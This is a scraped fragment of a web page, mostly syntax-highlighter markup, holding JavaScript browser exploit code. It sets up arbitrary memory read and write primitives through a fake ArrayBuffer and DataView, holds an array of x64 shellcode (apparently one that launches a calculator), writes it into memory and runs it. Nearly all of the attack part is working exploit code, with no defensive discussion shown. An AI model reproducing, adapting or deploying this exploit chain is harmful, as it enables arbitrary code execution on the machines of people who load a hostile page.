u2d(e4()) + 0x38-1;  \t  \/**************************************  And now,we get arbitrary memory read write!!!!!!   ******************************************\/  \t  \tfunction Read32(addr){  \t\tfake_ab_float[4] = d2u(addr \/ 0x100000000,addr &amp; 0xffffffff);  \t\treturn fake_dv.getUint32(0,true);  \t}  \tfunction Write32(addr,value){  \t\tfake_ab_float[4] = d2u(addr \/ 0x100000000,addr &amp; 0xffffffff);  \t\talert(&#8220;w&#8221;);  \t\tfake_dv.setUint32(0,value,true);  \t}  \tshellcode_address = Read32(shellcode_address_ref) + Read32(shellcode_address_ref+0x4) * 0x100000000;;  \t  \tvar addr = shellcode_address;  \t  \tfake_ab_float[4] = d2u(addr \/ 0x100000000,addr &amp; 0xffffffff);  \tfor(var i = 0; i &lt; shellcode.length;i++){  \t\tvar value = shellcode[i];\t\t  \t\tfake_dv.setUint32(i * 4,value,true);  \t}  \talert(&#8220;boom&#8221;);  \tfunction_to_shellcode();      &lt;\/script&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-95\">95<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-96\">96<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-97\">97<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-98\">98<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-99\">99<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-100\">100<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-101\">101<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-102\">102<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-103\">103<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-104\">104<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-105\">105<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-106\">106<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-107\">107<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-108\">108<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-109\">109<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-110\">110<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-111\">111<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-112\">112<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-113\">113<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-114\">114<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-115\">115<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-116\">116<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-117\">117<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-118\">118<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-119\">119<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-120\">120<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-121\">121<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-122\">122<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-123\">123<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-124\">124<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-125\">125<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-126\">126<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-127\">127<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-128\">128<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-129\">129<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-130\">130<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-131\">131<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-132\">132<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-133\">133<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-134\">134<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-135\">135<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-136\">136<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-137\">137<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-138\">138<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-139\">139<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-140\">140<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-141\">141<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-142\">142<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-143\">143<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-144\">144<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-145\">145<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-146\">146<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-147\">147<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-148\">148<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-149\">149<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-150\">150<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-151\">151<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-152\">152<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-153\">153<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-154\">154<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-155\">155<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-156\">156<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-157\">157<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-158\">158<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-159\">159<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-160\">160<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-161\">161<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-162\">162<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-163\">163<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-164\">164<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-165\">165<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-166\">166<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-167\">167<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-168\">168<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-169\">169<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-170\">170<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-171\">171<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-172\">172<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-1\"><span class=\"crayon-ta\">&lt;script&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-3\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">shellcode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0xe48348fc<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x00c0e8f0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x51410000<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x51525041<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xd2314856<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x528b4865<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x528b4860<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x528b4818<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x728b4820<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xb70f4850<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x314d4a4a<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xc03148c9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x7c613cac<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x41202c02<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x410dc9c1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xede2c101<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x48514152<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x8b20528b<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x01483c42<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x88808bd0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x48000000<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x6774c085<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x50d00148<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4418488b<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4920408b<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x56e3d001<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x41c9ff48<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4888348b<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x314dd601<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xc03148c9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xc9c141ac<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xc101410d<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xf175e038<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x244c034c<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xd1394508<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4458d875<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4924408b<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4166d001<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x44480c8b<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x491c408b<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x8b41d001<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x01488804<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x415841d0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x5a595e58<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x59415841<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x83485a41<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x524120ec<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4158e0ff<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x8b485a59<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xff57e912<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x485dffff<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x000001ba<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x00000000<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x8d8d4800<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x00000101<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x8b31ba41<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xd5ff876f<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xa2b5f0bb<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xa6ba4156<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xff9dbd95<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xc48348d5<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x7c063c28<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xe0fb800a<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x47bb0575<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x6a6f7213<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x89415900<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x63d5ffda<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x00636c61<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-4\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-5\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arraybuffer<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ArrayBuffer<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-6\"><span class=\"crayon-v\">flag<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-7\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">gc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-cn\">0x100000<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x10<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-11\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-12\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">d2u<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">num1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">num2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">d<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Uint32Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">d<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">num2<\/span><span 